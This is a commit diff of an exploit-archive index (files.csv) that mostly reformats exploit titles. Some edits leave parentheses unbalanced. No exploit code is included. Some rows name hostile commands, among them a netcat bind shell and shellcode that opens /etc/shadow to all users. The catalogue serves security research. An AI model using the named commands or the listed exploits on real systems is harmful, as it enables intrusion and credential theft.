DB: 2016-03-22

14 new exploits Drupal <= 4.5.3 & <= 4.6.1 Comments PHP Injection Exploit Drupal <= 4.5.3 & <= 4.6.1 - Comments PHP Injection Exploit phpBB 2.0.15 - Remote PHP Code Execution Exploit (metasploit) phpBB 2.0.15 - Remote PHP Code Execution Exploit (Metasploit vBulletin <= 3.0.6 (Template) Command Execution Exploit (metasploit) vBulletin <= 3.0.6 (Template) Command Execution Exploit (Metasploit WordPress <= 1.5.1.3 - Remote Code Execution eXploit (metasploit) WordPress <= 1.5.1.3 - Remote Code Execution eXploit (Metasploit Solaris <= 10 LPD Arbitrary File Delete Exploit (metasploit) Solaris <= 10 LPD Arbitrary File Delete Exploit (Metasploit Horde <= 3.0.9/3.1.0 - (Help Viewer) Remote Code Execution (metasploit) Horde <= 3.0.9/3.1.0 - (Help Viewer) Remote Code Execution (Metasploit Softerra PHP Developer Library <= 1.5.3 File Include Vulnerabilities Softerra PHP Developer Library <= 1.5.3 - File Include Vulnerabilities IDEAL Administration 2009 9.7 - Buffer Overflow - Metasploit Universal IDEAL Administration 2009 9.7 - Buffer Overflow (Metasploit) PHP RapidKill Pro 5.x Shell Upload Vulnerability PHP RapidKill Pro 5.x - Shell Upload Vulnerability Shellcode - Win32 MessageBox (Metasploit module) Shellcode - Win32 MessageBox (Metasploit) Php Nuke 8.x.x - BlindSQL Injection Vulnerability PHP-Nuke 8.x.x - BlindSQL Injection Vulnerability Integard Pro 2.2.0.9026 - (Win7 ROP-Code Metasploit Module) Integard Pro 2.2.0.9026 - Windows 7 ROP-Code (Metasploit) Digital Music Pad 8.2.3.3.4 - SEH Overflow Metasploit Module Digital Music Pad 8.2.3.3.4 - SEH Overflow (Metasploit) MaticMarket 2.02 for PHP Nuke LFI Vulnerability MaticMarket 2.02 for PHP-Nuke - LFI Vulnerability Microsoft Word 2003 - Record Parsing Buffer Overflow (Metasploit) (MS09-027) Microsoft Word 2003 - Record Parsing Buffer Overflow (MS09-027) (Metasploit) Actfax FTP Server <= 4.27 - USER Command Stack Buffer Overflow (Metasploit) (0day) Actfax FTP Server <= 4.27 - USER Command Stack Buffer Overflow (0day) (Metasploit) Metasploit 4.1.0 Web UI stored XSS Vulnerability Metasploit 4.1.0 Web UI - Stored XSS Vulnerability PHP Nuke 1.0/2.5/3.0/4.x - Remote Ad Banner URL Change Vulnerability PHP-Nuke 1.0/2.5/3.0/4.x - Remote Ad Banner URL Change Vulnerability Microsoft Visual Studio RAD Support Buffer Overflow Vulnerability (metasploit) Microsoft Visual Studio RAD Support Buffer Overflow Vulnerability (Metasploit PHP Nuke 5.0 - 'user.php' Form Element Substitution Vulnerabilty PHP-Nuke 5.0 - 'user.php' Form Element Substitution Vulnerabilty PHP Nuke 5.x Error Message Web Root Disclosure Vulnerability PHP-Nuke 5.x - Error Message Web Root Disclosure Vulnerability PHP Nuke 8.2.4 - CSRF Vulnerability PHP-Nuke 8.2.4 - CSRF Vulnerability DCP-Portal 3.7/4.x/5.x Calendar.PHP HTTP Response Splitting Vulnerability DCP-Portal 3.7/4.x/5.x - Calendar.PHP HTTP Response Splitting Vulnerability PHP Nuke 0-7 Double Hex Encoded Input Validation Vulnerability PHP-Nuke 0-7 - Double Hex Encoded Input Validation Vulnerability PHP 4.x/5.x Html_Entity_Decode() Information Disclosure Vulnerability PHP 4.x/5.x - Html_Entity_Decode() Information Disclosure Vulnerability Western Digital Arkeia Remote Code Execution (Metasploit) Western Digital Arkeia - Remote Code Execution (Metasploit) Apache + PHP 5.x (< 5.3.12 & < 5.4.2) - cgi-bin Remote Code Execution Exploit Apache + PHP 5.x (< 5.3.12 / < 5.4.2) - Remote Code Execution (Multithreaded Scanner) Apache + PHP 5.x (< 5.3.12 & < 5.4.2) - Remote Code Execution (Multithreaded Scanner) PHP PEAR <= 1.5.3 INSTALL-AS Attribute Arbitrary File Overwrite Vulnerability PHP PEAR <= 1.5.3 - INSTALL-AS Attribute Arbitrary File Overwrite Vulnerability GNU bash Environment Variable Command Injection (Metasploit) GNU Bash - Environment Variable Command Injection (Metasploit) Bash - CGI RCE (Metasploit) Shellshock Exploit Bash - CGI RCE Shellshock Exploit (Metasploit) Endian Firewall < 3.0.0 - OS Command Injection (Metasploit Module) Endian Firewall < 3.0.0 - OS Command Injection (Metasploit) Windows - Secondary Logon Standard Handles Missing Sanitization Privilege Escalation (MS16-032) WordPress eBook Download Plugin 1.1 - Directory Traversal WordPress Import CSV Plugin 1.0 - Directory Traversal WordPress Abtest Plugin - Local File Inclusion Internet Download Manager 6.25 Build 14 - 'Find file' Unicode SEH Exploit Disc ORGanizer - DORG - Multiple Vulnerabilities D-Link DWR-932 Firmware 4.00 - Authentication Bypass Xoops 2.5.7.2 - Arbitrary User Deletions CSRF Xoops 2.5.7.2 - Directory Traversal Bypass WordPress Image Export Plugin 1.1.0 - Arbitrary File Disclosure Sysax Multi Server 6.50 - HTTP File Share SEH Overflow RCE Exploit Dating Pro Genie 2015.7 - CSRF Vulnerabilities iTop 2.2.1 - CSRF Vulnerability ProjectSend r582 - Multiple XSS Vulnerabilities
2016-03-22 05:02:50 +00:00 · 2016-03-22 05:02:50 +00:00 · 2c01698aec
commit 2c01698aec
parent 47d7100c18
17 changed files with 1047 additions and 491 deletions
--- a/files.csv
+++ b/files.csv
@ -896,7 +896,7 @@ id,file,description,date,author,platform,type,port
 1085,platforms/windows/local/1085.c,"Willing Webcam 2.8 Licence Info Disclosure Local Exploit",2005-07-04,Kozan,windows,local,0
 1086,platforms/windows/local/1086.c,"Access Remote PC 4.5.1 - Local Password Disclosure Exploit",2005-07-04,Kozan,windows,local,0
 1087,platforms/bsd/local/1087.c,"Sudo 1.3.1 - 1.6.8p - Pathname Validation Local Root Exploit (OpenBSD)",2005-07-04,RusH,bsd,local,0
-1088,platforms/php/webapps/1088.pl,"Drupal <= 4.5.3 & <= 4.6.1 Comments PHP Injection Exploit",2005-07-05,dab,php,webapps,0
+1088,platforms/php/webapps/1088.pl,"Drupal <= 4.5.3 & <= 4.6.1 - Comments PHP Injection Exploit",2005-07-05,dab,php,webapps,0
 1089,platforms/windows/remote/1089.c,"Mozilla FireFox <= 1.0.1 - Remote GIF Heap Overflow Exploit",2005-07-05,darkeagle,windows,remote,0
 1090,platforms/windows/dos/1090.cpp,"TCP Chat (TCPX) 1.0 - Denial of Service Exploit",2005-07-06,basher13,windows,dos,0
 1091,platforms/windows/local/1091.c,"Internet Download Manager <= 4.0.5 - Input URL Stack Overflow Exploit",2005-07-06,c0d3r,windows,local,0
@ -920,7 +920,7 @@ id,file,description,date,author,platform,type,port
 1110,platforms/windows/dos/1110.txt,"Microsoft Internet Explorer / MSN ICC Profiles Crash PoC Exploit",2005-07-15,"Edward Gagnon",windows,dos,0
 1111,platforms/php/webapps/1111.pl,"Open Bulletin Board <= 1.0.5 - SQL Injection Exploit",2005-07-18,RusH,php,webapps,0
 1112,platforms/asp/webapps/1112.txt,"Hosting Controller <= 6.1 HotFix 2.2 Add Domain without Quota Exploit",2005-07-18,"Soroush Dalili",asp,webapps,0
-1113,platforms/php/webapps/1113.pm,"phpBB 2.0.15 - Remote PHP Code Execution Exploit (metasploit)",2005-07-19,str0ke,php,webapps,0
+1113,platforms/php/webapps/1113.pm,"phpBB 2.0.15 - Remote PHP Code Execution Exploit (Metasploit",2005-07-19,str0ke,php,webapps,0
 1114,platforms/multiple/remote/1114.c,"HP OpenView OmniBack II Generic Remote Exploit",2000-12-21,DiGiT,multiple,remote,5555
 1115,platforms/windows/remote/1115.pl,"Intruder Client 1.00 - Remote Command Execution & DoS Exploit",2005-07-21,basher13,windows,remote,0
 1116,platforms/windows/dos/1116.c,"Microsoft Windows - Color Management Module Overflow Exploit (MS05-036)",2005-07-21,snooq,windows,dos,0
@ -937,7 +937,7 @@ id,file,description,date,author,platform,type,port
 1130,platforms/windows/remote/1130.c,"CA BrightStor ARCserve Backup Agent (dbasqlr.exe) Remote Exploit",2005-08-03,cybertronic,windows,remote,6070
 1131,platforms/windows/remote/1131.c,"CA BrightStor ARCserve Backup (dsconfig.exe) Buffer Overflow",2005-08-03,cybertronic,windows,remote,41523
 1132,platforms/windows/remote/1132.c,"CA BrightStor ARCserve Backup Auto Scanner / Exploiter",2005-08-03,cybertronic,windows,remote,6070
-1133,platforms/php/webapps/1133.pm,"vBulletin <= 3.0.6 (Template) Command Execution Exploit (metasploit)",2005-08-03,str0ke,php,webapps,0
+1133,platforms/php/webapps/1133.pm,"vBulletin <= 3.0.6 (Template) Command Execution Exploit (Metasploit",2005-08-03,str0ke,php,webapps,0
 1134,platforms/php/webapps/1134.pl,"MySQL Eventum <= 1.5.5 (login.php) SQL Injection Exploit",2005-08-05,"James Bercegay",php,webapps,0
 1135,platforms/php/webapps/1135.c,"PHP-Fusion <= 6.0 106 BBCode IMG Tag Script Injection Exploit",2005-08-05,Easyex,php,webapps,0
 1137,platforms/windows/dos/1137.pl,"Acunetix HTTP Sniffer Denial of Service Exploit",2005-08-05,basher13,windows,dos,0
@ -947,7 +947,7 @@ id,file,description,date,author,platform,type,port
 1142,platforms/php/webapps/1142.php,"WordPress <= 1.5.1.3 - Remote Code Execution (0Day)",2005-08-09,Kartoffelguru,php,webapps,0
 1143,platforms/windows/dos/1143.sys,"Microsoft Windows XP SP2 (rdpwd.sys) Remote Kernel DoS Exploit",2005-08-09,"Tom Ferris",windows,dos,0
 1144,platforms/windows/remote/1144.html,"Microsoft Internet Explorer (blnmgr.dll) COM Object Remote Exploit (MS05-038)",2005-08-09,FrSIRT,windows,remote,0
-1145,platforms/php/webapps/1145.pm,"WordPress <= 1.5.1.3 - Remote Code Execution eXploit (metasploit)",2005-08-10,str0ke,php,webapps,0
+1145,platforms/php/webapps/1145.pm,"WordPress <= 1.5.1.3 - Remote Code Execution eXploit (Metasploit",2005-08-10,str0ke,php,webapps,0
 1146,platforms/windows/remote/1146.c,"Microsoft Windows Plug-and-Play Service Remote Overflow (MS05-039)",2005-08-11,sl0ppy,windows,remote,139
 1147,platforms/windows/remote/1147.pm,"Veritas Backup Exec Remote File Access Exploit (windows)",2005-08-11,N/A,windows,remote,10000
 1149,platforms/windows/remote/1149.c,"Microsoft Windows Plug-and-Play Service - Remote Universal Exploit (MS05-039)",2005-08-12,houseofdabus,windows,remote,445
@ -967,7 +967,7 @@ id,file,description,date,author,platform,type,port
 1164,platforms/windows/dos/1164.pl,"BusinessMail <= 4.60.00 - Remote Buffer Overflow Exploit",2005-07-30,"Reed Arvin",windows,dos,0
 1165,platforms/windows/dos/1165.pl,"Inframail Advantage Server Edition 6.0 <= 6.37 - (SMTP) BoF Exploit",2005-06-27,"Reed Arvin",windows,dos,0
 1166,platforms/windows/dos/1166.pl,"Inframail Advantage Server Edition 6.0 <= 6.37 - (FTP) BoF Exploit",2005-06-27,"Reed Arvin",windows,dos,0
-1167,platforms/solaris/remote/1167.pm,"Solaris <= 10 LPD Arbitrary File Delete Exploit (metasploit)",2005-08-19,Optyx,solaris,remote,0
+1167,platforms/solaris/remote/1167.pm,"Solaris <= 10 LPD Arbitrary File Delete Exploit (Metasploit",2005-08-19,Optyx,solaris,remote,0
 1168,platforms/windows/local/1168.c,"WinAce 2.6.0.5 Temporary File Parsing Buffer Overflow Vulnerability",2005-08-19,ATmaCA,windows,local,0
 1170,platforms/linux/local/1170.c,"Debian 2.2 /usr/bin/pileup Local Root Exploit",2001-07-13,"Charles Stevenson",linux,local,0
 1171,platforms/linux/remote/1171.c,"Elm < 2.5.8 (Expires Header) Remote Buffer Overflow Exploit",2005-08-22,c0ntex,linux,remote,0
@ -1391,7 +1391,7 @@ id,file,description,date,author,platform,type,port
 1656,platforms/php/webapps/1656.txt,"Sire 2.0 (lire.php) Remote File Inclusion/Arbitary File Upload Vulnerability",2006-04-09,simo64,php,webapps,0
 1657,platforms/linux/dos/1657.asm,"Linux Kernel 2.6.x - sys_timer_create() Local Denial of Service Exploit",2006-04-09,fingerout,linux,dos,0
 1659,platforms/php/webapps/1659.php,"PHPList <= 2.10.2 - GLOBALS[] Remote Code Execution Exploit",2006-04-10,rgod,php,webapps,0
-1660,platforms/php/webapps/1660.pm,"Horde <= 3.0.9/3.1.0 - (Help Viewer) Remote Code Execution (metasploit)",2006-04-10,Inkubus,php,webapps,0
+1660,platforms/php/webapps/1660.pm,"Horde <= 3.0.9/3.1.0 - (Help Viewer) Remote Code Execution (Metasploit",2006-04-10,Inkubus,php,webapps,0
 1661,platforms/php/webapps/1661.pl,"phpBB <= 2.0.19 (user_sig_bbcode_uid) Remote Code Execution Exploit",2006-04-10,RusH,php,webapps,0
 1662,platforms/php/webapps/1662.php,"Clansys 1.1 (showid) - Remote SQL Injection Exploit",2006-04-10,snatcher,php,webapps,0
 1663,platforms/php/webapps/1663.php,"Simplog <= 0.9.2 (s) Remote Commands Execution Exploit",2006-04-11,rgod,php,webapps,0
@ -2213,7 +2213,7 @@ id,file,description,date,author,platform,type,port
 2517,platforms/php/webapps/2517.pl,"PHP News Reader <= 2.6.4 (phpbb.inc.php) Remote File Include Exploit",2006-10-11,"Nima Salehi",php,webapps,0
 2518,platforms/php/webapps/2518.txt,"SH-News <= 3.1 (scriptpath) Multiple Remote File Include Vulnerabilities",2006-10-11,v1per-haCker,php,webapps,0
 2519,platforms/php/webapps/2519.txt,"Minichat 6.0 - (ftag.php) Remote File Include Vulnerability",2006-10-11,Zickox,php,webapps,0
-2520,platforms/php/webapps/2520.txt,"Softerra PHP Developer Library <= 1.5.3 File Include Vulnerabilities",2006-10-12,MP,php,webapps,0
+2520,platforms/php/webapps/2520.txt,"Softerra PHP Developer Library <= 1.5.3 - File Include Vulnerabilities",2006-10-12,MP,php,webapps,0
 2521,platforms/php/webapps/2521.txt,"Download-Engine <= 1.4.2 (spaw) Remote File Include Vulnerability",2006-10-12,v1per-haCker,php,webapps,0
 2522,platforms/php/webapps/2522.txt,"phpBB Journals System Mod 1.0.2 [RC2] - Remote File Include Exploit",2006-10-12,"Nima Salehi",php,webapps,0
 2523,platforms/windows/dos/2523.pl,"Microsoft Office 2003 PPT Local Buffer Overflow PoC",2006-10-12,Nanika,windows,dos,0
@ -9618,7 +9618,7 @@ id,file,description,date,author,platform,type,port
 10329,platforms/php/webapps/10329.txt,"AROUNDMe <= 1.1 (language_path) Remote File Include Exploit",2009-12-06,"cr4wl3r ",php,webapps,0
 10330,platforms/php/webapps/10330.txt,"elkagroup SQL Injection Vulnerability",2009-12-06,SadHaCkEr,php,webapps,0
 10331,platforms/windows/webapps/10331.txt,"iWeb HTTP Server Directory Transversal Vulnerability",2009-12-06,mr_me,windows,webapps,0
-10332,platforms/windows/local/10332.rb,"IDEAL Administration 2009 9.7 - Buffer Overflow - Metasploit Universal",2009-12-06,dookie,windows,local,0
+10332,platforms/windows/local/10332.rb,"IDEAL Administration 2009 9.7 - Buffer Overflow (Metasploit)",2009-12-06,dookie,windows,local,0
 10333,platforms/windows/dos/10333.py,"VLC Media Player 1.0.3 smb:// URI Handling Remote Stack Overflow PoC",2009-12-06,Dr_IDE,windows,dos,0
 10334,platforms/multiple/dos/10334.py,"VLC Media Player <= 1.0.3 RTSP Buffer Overflow PoC (OSX/Linux)",2009-12-06,Dr_IDE,multiple,dos,0
 10335,platforms/windows/local/10335.rb,"HTML Help Workshop 4.74 - (hhp Project File) Buffer Overflow Exploit (Metasploit)",2009-12-07,loneferret,windows,local,0
@ -11212,7 +11212,7 @@ id,file,description,date,author,platform,type,port
 12268,platforms/php/webapps/12268.txt,"Uploader 0.7 Shell Upload Vulnerability",2010-04-16,DigitALL,php,webapps,0
 12269,platforms/php/webapps/12269.txt,"Joomla Component com_joltcard SQL Injection Vulnerability",2010-04-16,Valentin,php,webapps,0
 12270,platforms/php/webapps/12270.txt,"Joomla Component com_pandafminigames SQL Injection Vulnerabilities",2010-04-16,Valentin,php,webapps,0
-12272,platforms/php/webapps/12272.txt,"PHP RapidKill Pro 5.x Shell Upload Vulnerability",2010-04-17,DigitALL,php,webapps,0
+12272,platforms/php/webapps/12272.txt,"PHP RapidKill Pro 5.x - Shell Upload Vulnerability",2010-04-17,DigitALL,php,webapps,0
 12273,platforms/windows/dos/12273.py,"Windows 7/2008R2 SMB Client Trans2 - Stack Overflow 10-020 PoC",2010-04-17,"laurent gaffie",windows,dos,0
 12274,platforms/windows/dos/12274.py,"Multiple Vendor AgentX++ Stack Buffer Overflow",2010-04-17,ZSploit.com,windows,dos,0
 12276,platforms/php/webapps/12276.txt,"redaxo CMS 4.2.1 - Remote File Inclusion Vulnerability",2010-04-18,eidelweiss,php,webapps,0
@ -12056,7 +12056,7 @@ id,file,description,date,author,platform,type,port
 13642,platforms/windows/shellcode/13642.txt,"Win32 Mini HardCode WinExec&ExitProcess Shellcode 16 bytes",2010-03-18,czy,windows,shellcode,0
 13645,platforms/windows/shellcode/13645.c,"JITed egg-hunter stage-0 shellcode",2010-03-20,"Alexey Sintsov",windows,shellcode,0
 13647,platforms/windows/shellcode/13647.txt,"win32/xp sp3 (Ru) WinExec+ExitProcess cmd shellcode 12 bytes",2010-03-24,"lord Kelvin",windows,shellcode,0
-13648,platforms/win32/shellcode/13648.rb,"Shellcode - Win32 MessageBox (Metasploit module)",2010-03-24,corelanc0d3r,win32,shellcode,0
+13648,platforms/win32/shellcode/13648.rb,"Shellcode - Win32 MessageBox (Metasploit)",2010-03-24,corelanc0d3r,win32,shellcode,0
 13649,platforms/windows/shellcode/13649.txt,"JITed egg-hunter stage-0 shellcode Adjusted universal for xp/vista/win7",2010-03-27,"Alexey Sintsov",windows,shellcode,0
 13661,platforms/linux/shellcode/13661.txt,"linux x86 - nc -lvve/bin/sh -p13377 shellcode",2010-04-02,anonymous,linux,shellcode,0
 13669,platforms/linux/shellcode/13669.c,"chmod(_/etc/shadow__ 0666) shellcode (36 bytes)",2010-04-14,Magnefikko,linux,shellcode,0
@ -12788,7 +12788,7 @@ id,file,description,date,author,platform,type,port
 14586,platforms/windows/remote/14586.html,"dBpowerAMP Audio Player 2 - (FileExists) ActiveX Buffer Overflow Exploit",2010-08-09,s-dz,windows,remote,0
 14598,platforms/php/webapps/14598.txt,"Joomla Component Teams Multiple Blind SQL Injection Vulnerabilities",2010-08-10,"Salvatore Fresta",php,webapps,0
 14591,platforms/windows/local/14591.py,"Fat Player 0.6b - WAV File Processing Buffer Overflow (SEH)",2010-08-09,"Praveen Darshanam",windows,local,0
-14589,platforms/php/webapps/14589.txt,"Php Nuke 8.x.x - BlindSQL Injection Vulnerability",2010-08-09,ITSecTeam,php,webapps,0
+14589,platforms/php/webapps/14589.txt,"PHP-Nuke 8.x.x - BlindSQL Injection Vulnerability",2010-08-09,ITSecTeam,php,webapps,0
 14592,platforms/php/webapps/14592.txt,"Joomla Yellowpages SQL Injection Vulnerability",2010-08-09,"al bayraqim",php,webapps,0
 14593,platforms/windows/dos/14593.htm,"AoAAudioExtractor 2.0.0.0 - ActiveX PoC (SEH)",2010-08-09,s-dz,windows,dos,0
 14594,platforms/linux/dos/14594.py,"Linux Kernel <= 2.6.33.3 - SCTP INIT Remote DoS",2010-08-09,"Jon Oberheide",linux,dos,0
@ -13092,7 +13092,7 @@ id,file,description,date,author,platform,type,port
 15011,platforms/php/webapps/15011.txt,"php microcms 1.0.1 - Multiple Vulnerabilities",2010-09-15,Abysssec,php,webapps,0
 15013,platforms/windows/local/15013.pl,"MP3 Workstation 9.2.1.1.2 - SEH Exploit",2010-09-15,"sanjeev gupta",windows,local,0
 15014,platforms/php/webapps/15014.txt,"pixelpost 1.7.3 - Multiple Vulnerabilities",2010-09-15,Sweet,php,webapps,0
-15016,platforms/windows/remote/15016.rb,"Integard Pro 2.2.0.9026 - (Win7 ROP-Code Metasploit Module)",2010-09-15,Node,windows,remote,0
+15016,platforms/windows/remote/15016.rb,"Integard Pro 2.2.0.9026 - Windows 7 ROP-Code  (Metasploit)",2010-09-15,Node,windows,remote,0
 36828,platforms/java/webapps/36828.txt,"JaWiki 'versionNo' Parameter Cross Site Scripting Vulnerability",2012-02-17,sonyy,java,webapps,0
 15017,platforms/windows/dos/15017.py,"Chalk Creek Media Player 1.0.7 - (.mp3 / .wma) Denial of Service Vulnerability",2010-09-16,"Carlos Mario Penagos Hollmann",windows,dos,0
 15018,platforms/asp/webapps/15018.txt,"mojoportal - Multiple Vulnerabilities",2010-09-16,Abysssec,asp,webapps,0
@ -13173,7 +13173,7 @@ id,file,description,date,author,platform,type,port
 15130,platforms/cgi/webapps/15130.sh,"Barracuda Networks Spam & Virus Firewall <= 4.1.1.021 - Remote Configuration Retrieval",2010-09-27,ShadowHatesYou,cgi,webapps,0
 15131,platforms/windows/dos/15131.txt,"Fox Audio Player 0.8.0 - (.m3u) Denial of Service Vulnerability",2010-09-27,4n0nym0us,windows,dos,0
 15133,platforms/windows/local/15133.pl,"iworkstation 9.3.2.1.4 - seh Exploit",2010-09-27,"sanjeev gupta",windows,local,0
-15134,platforms/windows/local/15134.rb,"Digital Music Pad 8.2.3.3.4 - SEH Overflow Metasploit Module",2010-09-27,"Abhishek Lyall",windows,local,0
+15134,platforms/windows/local/15134.rb,"Digital Music Pad 8.2.3.3.4 - SEH Overflow (Metasploit)",2010-09-27,"Abhishek Lyall",windows,local,0
 15128,platforms/win32/webapps/15128.txt,"Allpc 2.5 osCommerce SQL/XSS Multiple Vulnerabilities",2010-09-27,**RoAd_KiLlEr**,win32,webapps,80
 15198,platforms/php/webapps/15198.txt,"Aprox CMS Engine 6.0 - Multiple Vulnerabilities",2010-10-03,"Stephan Sattler",php,webapps,0
 15135,platforms/php/webapps/15135.txt,"Car Portal 2.0 - BLIND SQL Injection Vulnerability",2010-09-27,**RoAd_KiLlEr**,php,webapps,0
@ -13704,7 +13704,7 @@ id,file,description,date,author,platform,type,port
 15779,platforms/php/webapps/15779.txt,"Joomla JE Auto Component (com_jeauto) LFI Vulnerability",2010-12-19,Sid3^effects,php,webapps,0
 15781,platforms/php/webapps/15781.txt,"Inout Webmail Script Persistent XSS Vulnerability",2010-12-20,Sid3^effects,php,webapps,0
 15782,platforms/windows/local/15782.pl,"Word Splash Pro <= 9.5 - Buffer Overflow",2010-12-20,h1ch4m,windows,local,0
-15783,platforms/php/webapps/15783.txt,"MaticMarket 2.02 for PHP Nuke LFI Vulnerability",2010-12-20,xer0x,php,webapps,0
+15783,platforms/php/webapps/15783.txt,"MaticMarket 2.02 for PHP-Nuke - LFI Vulnerability",2010-12-20,xer0x,php,webapps,0
 15784,platforms/asp/webapps/15784.txt,"Elcom CommunityManager.NET Auth Bypass Vulnerability",2010-12-20,"Sense of Security",asp,webapps,0
 15785,platforms/windows/local/15785.py,"MP3 CD Converter Professional BoF (SEH)",2010-12-20,"C4SS!0 G0M3S",windows,local,0
 15786,platforms/windows/dos/15786.py,"Accmeware MP3 Joiner Pro 5.0.9 - DoS PoC",2010-12-20,0v3r,windows,dos,0
@ -14954,7 +14954,7 @@ id,file,description,date,author,platform,type,port
 17174,platforms/multiple/webapps/17174.txt,"SQL-Ledger <= 2.8.33 Post-authentication Local File Include/Edit Vulnerability",2011-04-15,bitform,multiple,webapps,0
 17175,platforms/windows/remote/17175.rb,"Adobe Flash Player 10.2.153.1 SWF Memory Corruption Vulnerability",2011-04-16,metasploit,windows,remote,0
 17176,platforms/asp/webapps/17176.txt,"SoftXMLCMS Shell Upload Vulnerability",2011-04-16,Alexander,asp,webapps,0
-17177,platforms/windows/local/17177.rb,"Microsoft Word 2003 - Record Parsing Buffer Overflow (Metasploit) (MS09-027)",2011-04-16,"Andrew King",windows,local,0
+17177,platforms/windows/local/17177.rb,"Microsoft Word 2003 - Record Parsing Buffer Overflow (MS09-027) (Metasploit)",2011-04-16,"Andrew King",windows,local,0
 17183,platforms/php/webapps/17183.txt,"osPHPSite SQL Injection Vulnerability",2011-04-17,"vir0e5 ",php,webapps,0
 17188,platforms/windows/dos/17188.txt,"IBM Tivoli Directory Server SASL Bind Request Remote Code Execution",2011-04-19,"Francis Provencher",windows,dos,0
 17187,platforms/windows/remote/17187.txt,"Adobe Flash Player < 10.1.53.64 - Action Script Type Confusion Exploit (DEP+ASLR bypass)",2011-04-19,Abysssec,windows,remote,0
@ -15282,7 +15282,7 @@ id,file,description,date,author,platform,type,port
 17584,platforms/php/webapps/17584.php,"cFTP <= 0.1 (r80) Arbitrary File Upload",2011-07-29,leviathan,php,webapps,0
 17586,platforms/jsp/webapps/17586.txt,"ManageEngine ServiceDesk Plus 8.0 Build 8013 - Multiple XSS Vulnerabilities",2011-07-29,"Narendra Shinde",jsp,webapps,0
 17587,platforms/php/webapps/17587.txt,"Link Station Pro Multiple Vulnerabilities",2011-07-30,"$#4d0\/\/[r007k17]",php,webapps,0
-17588,platforms/windows/remote/17588.rb,"Actfax FTP Server <= 4.27 - USER Command Stack Buffer Overflow (Metasploit) (0day)",2011-07-31,mr_me,windows,remote,0
+17588,platforms/windows/remote/17588.rb,"Actfax FTP Server <= 4.27 - USER Command Stack Buffer Overflow (0day) (Metasploit)",2011-07-31,mr_me,windows,remote,0
 17590,platforms/php/webapps/17590.txt,"Digital Scribe 1.5 (register_form()) Multiple POST XSS Vulnerabilities",2011-07-31,LiquidWorm,php,webapps,0
 17591,platforms/php/webapps/17591.txt,"Joomla Component (com_obSuggest) Local File Inclusion Vulnerability",2011-07-31,v3n0m,php,webapps,0
 17592,platforms/php/webapps/17592.txt,"CMSPro! 2.08 - CSRF Vulnerability",2011-08-01,Xadpritox,php,webapps,0
@ -15646,7 +15646,7 @@ id,file,description,date,author,platform,type,port
 18008,platforms/windows/dos/18008.html,"Opera <= 11.52 - Stack Overflow",2011-10-20,pigtail23,windows,dos,0
 18009,platforms/asp/webapps/18009.txt,"Pre Studio Business Cards Designer SQL Injection",2011-10-20,dr_zig,asp,webapps,0
 18011,platforms/windows/dos/18011.txt,"UnrealIRCd 3.2.8.1 - Local Configuration Stack Overflow",2011-10-20,DiGMi,windows,dos,0
-18012,platforms/multiple/webapps/18012.txt,"Metasploit 4.1.0 Web UI stored XSS Vulnerability",2011-10-20,"Stefan Schurtz",multiple,webapps,0
+18012,platforms/multiple/webapps/18012.txt,"Metasploit 4.1.0 Web UI - Stored XSS Vulnerability",2011-10-20,"Stefan Schurtz",multiple,webapps,0
 18013,platforms/windows/webapps/18013.py,"Cyclope Internet Filtering Proxy 4.0 - Stored XSS",2011-10-20,loneferret,windows,webapps,0
 18014,platforms/windows/dos/18014.html,"Opera <= 11.51 Use After Free Crash PoC",2011-10-21,"Roberto Suggi Liverani",windows,dos,0
 18015,platforms/cgi/remote/18015.rb,"HP Power Manager - 'formExportDataLogs' Buffer Overflow",2011-10-20,metasploit,cgi,remote,0
@ -18039,7 +18039,7 @@ id,file,description,date,author,platform,type,port
 20726,platforms/windows/remote/20726.pl,"Gene6 BPFTP Server 2.0 File Existence Disclosure Vulnerability",2001-04-03,"Rob Beck",windows,remote,0
 20727,platforms/linux/remote/20727.c,"Ntpd Remote Buffer Overflow Vulnerability",2001-04-04,"babcia padlina ltd",linux,remote,0
 20728,platforms/windows/dos/20728.txt,"602Pro Lan Suite 2000a - Long HTTP Request Denial of Service Vulnerability",2001-04-05,nitr0s,windows,dos,0
-20729,platforms/php/webapps/20729.txt,"PHP Nuke 1.0/2.5/3.0/4.x - Remote Ad Banner URL Change Vulnerability",2001-04-02,"Juan Diego",php,webapps,0
+20729,platforms/php/webapps/20729.txt,"PHP-Nuke 1.0/2.5/3.0/4.x - Remote Ad Banner URL Change Vulnerability",2001-04-02,"Juan Diego",php,webapps,0
 20730,platforms/unix/remote/20730.c,"IPFilter 3.x Fragment Rule Bypass Vulnerability",2001-04-09,"Thomas Lopatic",unix,remote,0
 20731,platforms/bsd/remote/20731.c,"FreeBSD 2.2-4.2_NetBSD 1.2-4.5_OpenBSD 2.x ftpd glob() Buffer Overflow",2001-04-14,"fish stiqz",bsd,remote,0
 20732,platforms/freebsd/remote/20732.pl,"freebsd 4.2-stable ftpd glob() Buffer Overflow Vulnerabilities",2001-04-16,"Elias Levy",freebsd,remote,0
@ -18250,7 +18250,7 @@ id,file,description,date,author,platform,type,port
 20948,platforms/windows/remote/20948.txt,"1C: Arcadia Internet Store 1.0 Show Path Vulnerability",2001-06-21,ViperSV,windows,remote,0
 20949,platforms/windows/dos/20949.c,"1C: Arcadia Internet Store 1.0 - Denial of Service Vulnerability",2001-06-21,"NERF Security",windows,dos,0
 20950,platforms/windows/remote/20950.c,"Microsoft Visual Studio RAD Support Buffer Overflow Vulnerability",2001-06-21,"NSFOCUS Security Team",windows,remote,0
-20951,platforms/windows/remote/20951.pm,"Microsoft Visual Studio RAD Support Buffer Overflow Vulnerability (metasploit)",2001-06-21,"NSFOCUS Security Team",windows,remote,0
+20951,platforms/windows/remote/20951.pm,"Microsoft Visual Studio RAD Support Buffer Overflow Vulnerability (Metasploit",2001-06-21,"NSFOCUS Security Team",windows,remote,0
 20952,platforms/linux/dos/20952.c,"eXtremail 1.x/2.1 - Remote Format String Vulnerability (1)",2001-06-21,"Luca Ercoli",linux,dos,0
 20953,platforms/linux/remote/20953.c,"eXtremail 1.x/2.1 - Remote Format String Vulnerability (2)",2001-06-21,mu-b,linux,remote,0
 20954,platforms/linux/remote/20954.pl,"eXtremail 1.x/2.1 - Remote Format String Vulnerability (3)",2006-10-06,mu-b,linux,remote,0
@ -18333,7 +18333,7 @@ id,file,description,date,author,platform,type,port
 21035,platforms/windows/remote/21035.txt,"Snapstream PVS 1.2 Plaintext Password Vulnerability",2001-07-26,John,windows,remote,0
 21036,platforms/windows/remote/21036.pl,"WS-FTP 2.0 Anonymous Multiple FTP Command Buffer Overflow Vulnerability",2001-07-25,andreas,windows,remote,0
